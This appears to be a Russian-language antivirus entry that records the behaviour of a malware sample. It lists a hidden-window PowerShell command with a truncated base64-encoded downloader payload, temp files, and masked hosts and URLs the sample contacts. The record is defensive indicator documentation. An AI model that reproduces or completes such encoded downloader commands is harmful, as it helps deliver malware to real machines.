Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFEARABBAFoAUQBBAEEAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAnAHUAJwAsACcAQgBRAEEAYwAnACwAJwBEAEMARAAnACkAOwAkAE0AVQBCADEAdwBBAD0ATgBgAGUAdwAtAGAAbwBiAEoARQBDAFQAIAAoACcATgBlAHQAJwArAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\919688.cvr
- 'fa####-ville.net':80
- 'fa####-ville.net':443
- 'hi#####a.mipa.uns.ac.id':80
- http://fa####-ville.net/2017/y_J/
- http://hi#####a.mipa.uns.ac.id/wp-content/By_2/
- 'fa####-ville.net':443
- DNS ASK ba###ratek.com
- DNS ASK cl####.ideatech.pk
- DNS ASK fa####-ville.net
- DNS ASK ha###aacoub.com
- DNS ASK hi#####a.mipa.uns.ac.id
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFEARABBAFoAUQBBAEEAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAnAHUAJwAsACcAQgBRAEEAYwAnACwAJwBEAEMARAAnACkAOwAkAE0AVQBCADEAdwBBAD0ATgBgAGUAdwAtAGAAbwBiAEoARQBDAFQAIAAoACcATgBlAHQAJwArAC...' (со скрытым окном)